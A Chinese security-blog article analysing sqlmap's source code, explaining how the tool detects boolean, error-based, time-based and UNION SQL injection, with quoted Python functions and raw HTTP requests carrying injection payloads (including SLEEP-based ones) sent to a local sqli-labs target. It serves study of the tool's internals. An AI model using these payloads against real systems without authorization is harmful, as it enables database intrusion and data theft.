sqlmap 项目剖析(IV)

阅读量353195

|

发布时间 : 2021-12-24 15:30:54

 

0x00 TL;DR

本文将结合代码分析 sqlmap 中不同注入类型检测的实现方式,sqlmap 的注入检测均集成于 checkSqlInjection 函数中,笔者建议在阅读时对照着此函数源码。

对于如下 SQL 注入的前置操作,笔者将不再本文中进行分析,只记录核心内容:

  • 通过 heuristicCheckDbms 来使用布尔注入获取目标数据库类型
  • 替换 UNION 注入模板值
  • 判断 test 是否在 --technique
  • 判断 test 的注入类型是否已在之前的 test 中测出
  • 处理 --test-skip 参数
  • 处理 --dbms 参数
  • 处理 --level--risk 参数
  • 确定当前 test 所使用 request 中的 comment、payload
  • 遍历每一个 boundary 并结合 prefix、suffix 确定最终payload

上面这一长串都是实际进行测试的前置流程,正是因为笔者分析过,认为这一段对于掌握 sqlmap 核心技术是没有帮助的,因此在这一章中剔除了这一块的内容,感兴趣的可以自行看看 checkSqlInjection 函数 Parse test's <response> 往上的部分。

 

0x01 布尔注入

当 response 为 comparison 时会采用相似度比对的方式来判断是否存在注入,在进行检测时,首先会发送一个 false 请求,对应为如下代码:

def genCmpPayload():
    sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)

    boundPayload = agent.prefixQuery(sndPayload, prefix, where, clause)
    boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
    cmpPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)

    return cmpPayload

# Useful to set kb.matchRatio at first based on False response content
kb.matchRatio = None
kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE)
suggestion = None
Request.queryPage(genCmpPayload(), place, raise404=False)
falsePage, falseHeaders, falseCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode
falseRawResponse = "%s%s" % (falseHeaders, falsePage)

对应的请求如下:

// payload:1' AND 5769=6688 AND 'dDGI'='dDGI

GET /Less-1/Less-1?id=1%27%20AND%205769%3D6688%20AND%20%27dDGI%27%3D%27dDGI&method=no HTTP/1.1
Host: 192.168.3.119:8887
Pragma: no-cache
Cache-control: no-cache
Upgrade-Insecure-Requests: 1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-encoding: gzip, deflate
Accept-language: en-US,en;q=0.9
Connection: close

从 payload 来看,如果此处存在注入并且此 boundary 能够成功闭合的话,由于 5769与6688不相同,因此必然返回的是一个假页面,接下来 sqlmap 会将这个假页面与原始页面和 heuristicPage(启发式注入时的页面)进行相似度比对,如相似度为 1.0 则认为此 payload 无效,直接跳过后续检查:

if not any((kb.negativeLogic, conf.string, conf.notString, conf.code)):
    try:
        ratio = 1.0
        seqMatcher = getCurrentThreadData().seqMatcher

        for current in (kb.originalPage, kb.heuristicPage):
            seqMatcher.set_seq1(current or "")
            seqMatcher.set_seq2(falsePage or "")
            ratio *= seqMatcher.quick_ratio()

        if ratio == 1.0:
            continue
    except (MemoryError, OverflowError):
        pass

如果最终计算出来的相似度不为 1.0(不与原始页面相等),则接着发送一个 true 请求:

trueResult = Request.queryPage(reqPayload, place, raise404=False)

truePage, trueHeaders, trueCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode

trueRawResponse = "%s%s" % (trueHeaders, truePage)

上述的第一行代码会使用 true payload 发起一个请求,并将响应与原始响应进行相似度比对,如果最终得到的结论是两页面相似,则 queryPage 函数返回 True,发出的请求如下:

// payload:1' AND 8257=8257 AND 'kGeM'='kGeM

GET /Less-1/Less-1?id=1%27%20AND%208257%3D8257%20AND%20%27kGeM%27%3D%27kGeM&method=no HTTP/1.1
Host: 192.168.3.119:8887
Pragma: no-cache
Cache-control: no-cache
Upgrade-Insecure-Requests: 1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-encoding: gzip, deflate
Accept-language: en-US,en;q=0.9
Cookie: xxoo=yes
Connection: close

当 queryPage 返回 True 后,会再次发送一个 false 请求:

if trueResult and not(truePage == falsePage and not any((kb.nullConnection, conf.code))):
    # Perform the test's False request
    falseResult = Request.queryPage(genCmpPayload(), place, raise404=False)

对应的请求如下:

// 1' AND 3829=6005 AND 'ZwpG'='ZwpG

GET /Less-1/Less-1?id=1%27%20AND%203829%3D6005%20AND%20%27ZwpG%27%3D%27ZwpG&method=no HTTP/1.1
Host: 192.168.3.119:8887
Pragma: no-cache
Cache-control: no-cache
Upgrade-Insecure-Requests: 1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-encoding: gzip, deflate
Accept-language: en-US,en;q=0.9
Cookie: xxoo=yes
Connection: close

这个 false 请求的目的是为了判断其与原始页面是否不相似,如果不相似则 queryPage 返回 False,如果最终得出的结论是不相似,则认为当前 payload 注入成功:

if not falseResult:
    if kb.negativeLogic:
        boundPayload = agent.prefixQuery(kb.data.randomStr, prefix, where, clause)
        boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
        errorPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)

        errorResult = Request.queryPage(errorPayload, place, raise404=False)
        if errorResult:
            continue
    elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
        _ = comparison(kb.heuristicPage, None, getRatioValue=True)
        if (_ or 0) > (kb.matchRatio or 0):
            kb.matchRatio = _
            logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)

    # Reducing false-positive "appears" messages in heavily dynamic environment
    if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False):
        continue

    injectable = True # 认为注入成功

如果得出的结论是 false page 也与原始响应相似,则使用集的方式先去除页面中的 html 标签后取差集判断是否注入成功:

elif (threadData.lastComparisonRatio or 0) > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
    originalSet = set(getFilteredPageContent(kb.pageTemplate, True, "\n").split("\n"))
    trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
    falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))

    if threadData.lastErrorPage and threadData.lastErrorPage[1]:
        errorSet = set(getFilteredPageContent(threadData.lastErrorPage[1], True, "\n").split("\n"))
    else:
        errorSet = set()

    if originalSet == trueSet != falseSet:
        candidates = trueSet - falseSet - errorSet

        if candidates:
            candidates = sorted(candidates, key=len)
            for candidate in candidates:
                if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
                    suggestion = conf.string = candidate
                    injectable = True

                    infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % ("%s " % paramType if paramType != parameter else "", parameter, title, repr(conf.string).lstrip('u').strip("'"))
                    logger.info(infoMsg)

                    break

当 injectable 被设置为 True 后,会进行一系列的操作来告知用户可以通过什么命令行参数来帮助识别页面相似度(--string--not-string),笔者认为此处是没有必要的…

if injectable:
    if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
        if all((falseCode, trueCode)) and falseCode != trueCode:
            suggestion = conf.code = trueCode

            infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --code=%d)" % ("%s " % paramType if paramType != parameter else "", parameter, title, conf.code)
            logger.info(infoMsg)
        else:
            trueSet = set(extractTextTagContent(trueRawResponse))
            trueSet |= set(__ for _ in trueSet for __ in _.split())

            falseSet = set(extractTextTagContent(falseRawResponse))
            falseSet |= set(__ for _ in falseSet for __ in _.split())

            if threadData.lastErrorPage and threadData.lastErrorPage[1]:
                errorSet = set(extractTextTagContent(threadData.lastErrorPage[1]))
                errorSet |= set(__ for _ in errorSet for __ in _.split())
            else:
                errorSet = set()

            candidates = filterNone(_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet - errorSet))

            if candidates:
                candidates = sorted(candidates, key=len)
                for candidate in candidates:
                    if re.match(r"\A\w{2,}\Z", candidate):  # Note: length of 1 (e.g. --string=5) could cause trouble, especially in error message pages with partially reflected payload content
                        break

                suggestion = conf.string = candidate

                infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % ("%s " % paramType if paramType != parameter else "", parameter, title, repr(conf.string).lstrip('u').strip("'"))
                logger.info(infoMsg)

            if not any((conf.string, conf.notString)):
                candidates = filterNone(_.strip() if _.strip() in falseRawResponse and _.strip() not in trueRawResponse else None for _ in (falseSet - trueSet))

                if candidates:
                    candidates = sorted(candidates, key=len)
                    for candidate in candidates:
                        if re.match(r"\A\w+\Z", candidate):
                            break

                    suggestion = conf.notString = candidate

                    infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --not-string=\"%s\")" % ("%s " % paramType if paramType != parameter else "", parameter, title, repr(conf.notString).lstrip('u').strip("'"))
                    logger.info(infoMsg)

    if not suggestion:
        infoMsg = "%sparameter '%s' appears to be '%s' injectable " % ("%s " % paramType if paramType != parameter else "", parameter, title)
        singleTimeLogMessage(infoMsg)

总的来整体逻辑可以分为三个部分:

  1. 发送一个 false request 判断与原始页面是否相同,如果相同则不进行后续测试
  2. 发送一个 true request 判断与原始页面是否相似,如果相似则接着进行第3步
  3. 发送一个 false request 判断与原始页面是否相似,如果相似则认为存在注入
  4. 如果不相似则去除标签后取差集寻找差异部分,判断差异长度,如果长度大于10(CANDIDATE_SENTENCE_MIN_LENGTH)则认为存在注入

 

0x02 报错注入

当 response 为 grep 时会采用正则匹配的方式来判断是否存在注入,sqlmap 报错注入检测的精髓不在于检测逻辑而在于其所使用的 payload 能够确保如果存在报错注入则必然能够被对应正则匹配上,检测代码如下:

# Perform the test's request and grep the response
# body for the test's <grep> regular expression
try:
    page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
    output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)
    output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)
    output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)
    output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)

    if output:
        result = output == '1'

        if result:
            infoMsg = "%sparameter '%s' is '%s' injectable " % ("%s " % paramType if paramType != parameter else "", parameter, title)
            logger.info(infoMsg)

            injectable = True

这里首先会用报错的 payload 发送一个请求,并通过 extractRegexResult 函数结合 test.response.grep 中的正则判断 response 与 headers 中是否能够匹配到报错信息,如果能够匹配到则说明存在报错注入。

 

0x03 延时注入

当 response 为 time 时会采用响应时间对比的方式来判断是否存在注入,检测代码如下:

trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
trueCode = threadData.lastCode

if trueResult:
    # Extra validation step (e.g. to check for DROP protection mechanisms)
    if SLEEP_TIME_MARKER in reqPayload:
        falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, "0"), place, timeBasedCompare=True, raise404=False)
        if falseResult:
            continue

    # Confirm test's results
    trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)

    if trueResult:
        infoMsg = "%sparameter '%s' appears to be '%s' injectable " % ("%s " % paramType if paramType != parameter else "", parameter, title)
        logger.info(infoMsg)

        injectable = True

sqlmap 的响应时间比较代码在 queryPage 中,这里先看外在的检测逻辑,首先发送一个会延时的请求作为 trueResult,接下来修改延迟时间为 0,并再次发送一个请求作为 falseResult。

如果 trueResult 为真 且 falseResult 为假(代表一个延时成功一个延时失败,符合预期),则继续发送一个会延时的请求,再次判断此请求是否延时成功,如果此请求依旧能够成功延时则认为存在注入。

三个请求分别对应如下:

// payload:1' AND (SELECT 7225 FROM (SELECT(SLEEP(5)))iSkp) AND 'ZQCq'='ZQCq

GET /Less-1/Less-1?id=1%27%20AND%20%28SELECT%207225%20FROM%20%28SELECT%28SLEEP%285%29%29%29iSkp%29%20AND%20%27ZQCq%27%3D%27ZQCq&method=no HTTP/1.1
Host: 192.168.3.119:8887
Pragma: no-cache
Cache-control: no-cache
Upgrade-Insecure-Requests: 1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-encoding: gzip, deflate
Accept-language: en-US,en;q=0.9
Cookie: xxoo=yes
Connection: close

// payload:1' AND (SELECT 7225 FROM (SELECT(SLEEP(0)))iSkp) AND 'ZQCq'='ZQCq

GET /Less-1/Less-1?id=1%27%20AND%20%28SELECT%207225%20FROM%20%28SELECT%28SLEEP%280%29%29%29iSkp%29%20AND%20%27ZQCq%27%3D%27ZQCq&method=no HTTP/1.1
Host: 192.168.3.119:8887
Pragma: no-cache
Cache-control: no-cache
Upgrade-Insecure-Requests: 1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-encoding: gzip, deflate
Accept-language: en-US,en;q=0.9
Cookie: xxoo=yes
Connection: close

// payload:1' AND (SELECT 7225 FROM (SELECT(SLEEP(5)))iSkp) AND 'ZQCq'='ZQCq

GET /Less-1/Less-1?id=1%27%20AND%20%28SELECT%207225%20FROM%20%28SELECT%28SLEEP%285%29%29%29iSkp%29%20AND%20%27ZQCq%27%3D%27ZQCq&method=no HTTP/1.1
Host: 192.168.3.119:8887
Pragma: no-cache
Cache-control: no-cache
Upgrade-Insecure-Requests: 1
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-encoding: gzip, deflate
Accept-language: en-US,en;q=0.9
Cookie: xxoo=yes
Connection: close

那么 sqlmap 是如何判断某个请求是否被延时了呢?在测试延时注入之前,sqlmap 会发送N个请求来建立一个数据集,这N个请求应该是正常情况下未经过延时的请求:

在响应时间数据集建立完毕后,发送带有 payload 的请求,并调用 wasLastResponseDelayed 函数判断是否存在延时。

这个函数首先会计算N个请求响应时间的标准差:

deviation = stdev(kb.responseTimes.get(kb.responseTimeMode, []))

随后计算一个正常请求的最长响应时间(数据集的平均数 + 时间检查系数 * 标准差):

lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation

接下来判断当前请求所使用的时间是否大于 max(0.5,lowerStdLimit)

retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit))

如果 retVal 为 True 则认为当前请求延时了,反之则认为当前请求并没有延时,从这点也可以看出 sqlmap 的工程思想,使用了极其严谨的算法来确保不会出现误报。

 

0x04 联合查询注入

当 response 为 union 时会采用 _unionTestByCharBruteforce 函数实现 union 注入的检测逻辑。

_unionTestByCharBruteforce 分为两个步骤进行 union 注入的检测:

  1. 猜解列数(判断当前 sql 语句中对应的列数是多少)
  2. 获取输出点(判断哪一列的输出内容会展示在页面上,并获取具体输出点)

4.0 猜解列数

sqlmap 会使用 _findUnionCharCount 函数猜解列数,这个函数首先使用 _orderByTechnique 函数通过 order by 的方式猜解列数,如果无法通过 order by 猜解成功,则通过 UNION SELECT 的方式猜解列数。

4.0.0 order by

代码如图:

这个函数的逻辑并不复杂,它具有一个子函数 _orderByTest,这个子函数的作用是根据传入的 col 生成 payload 并发出请求,接着通过如下方式判断当前响应是否为 True(没有造成错误):

  1. 响应中不包含 “(warning|error):”, “order (by|clause)”, “unknown column”, “failed”、data types cannot be compared or sorted
  2. 当前响应与原响应相似

子函数的逻辑讲完了,回到主函数中,这里首先会发出一个 col 为1的请求来判断 order by 注入是否可用(因为如果存在 UNION 注入则列数至少为1),当且仅当子函数返回 True 时才会继续测试。

接下来会使用二分法对列数进行猜解,每一个 UNION 的 payload 都具有它对应的 min 和 max:

这里的数值会填充到 order by x 中的 x,经过二分法的测试后即可得出最终的列数。

4.0.1 union all select

接下来在测试代码中添加一段代码使 order by 注入无法使用:

if(strstr($id, 'ORDER BY')){
    die('nonono');
}

需要注意的是在使用 union all select 进行测试之前 sqlmap 会先进行一次询问:

it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests?

这句话的意思是如果没有发现其它的注入类型,则 UNION 注入仅执行基本的测试(order by),默认的选择为 Y,当为 Y 的时候 kb.futileUnion 会被设置为 True,此时则不会使用 union all select 检测列数,因此在这里需要手动输入 N。

接下来会首先通过一长串代码发送带有 UNION ALL SELECT xx,xx 的 payload,xx 的个数由 min 至 max,与原页面进行相似度比对后将相似度存入 ratios 中:

接下来如果填充的 xx 不为 NULL,则判断之前发送过的请求响应中是否包含填充的字符串,如果包含则认为 xx 的个数对应为实际列数:

if not isNullValue(kb.uChar):
    for regex in (kb.uChar.strip("'"), r'>\s*%s\s*<' % kb.uChar.strip("'")):
        contains = [count for count, content in pages.items() if re.search(regex, content or "", re.IGNORECASE) is not None]
        if len(contains) == 1:
            retVal = contains[0]
            break

这里也很容易理解,如果 UNION ALL SELECT ‘tlmn’,’tlmn’,’tlmn’ 时页面出现了 tlmn 这个字符串(当然在之前 sqlmap 会排除参数反射的情况),那必然是可以认为列数就是当前 ‘tlmn’ 的实际个数了。

当填充的 xx 为 NULL 时会通过与延时检测时类似的算法来判断是否已经猜解出了实际列数:

4.1 确认输出点

当列数猜解完毕后会确认输出点在哪一列,并确认输出位置便于后续数据的获取,这里首先会调用 _unionConfirm 函数,而其会接着调用 _unionPosition 函数确认输出点在哪一列。

_unionPosition 函数做的很简单,比如上一步获取到的列数为3,则会遍历1-3进行测试,1对应为 union all select 'xx',null,null,2对应为 union all select null,'xx',null,依次类推,如果 'xx' 出现在页面中,则能确认输出列具体为哪一列,后续就会选取此列进行数据的获取。

 

0x05 Reference

本文由tlmn原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/262850

安全客 - 有思想的安全新媒体

分享到:微信
+10赞
收藏
tlmn
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66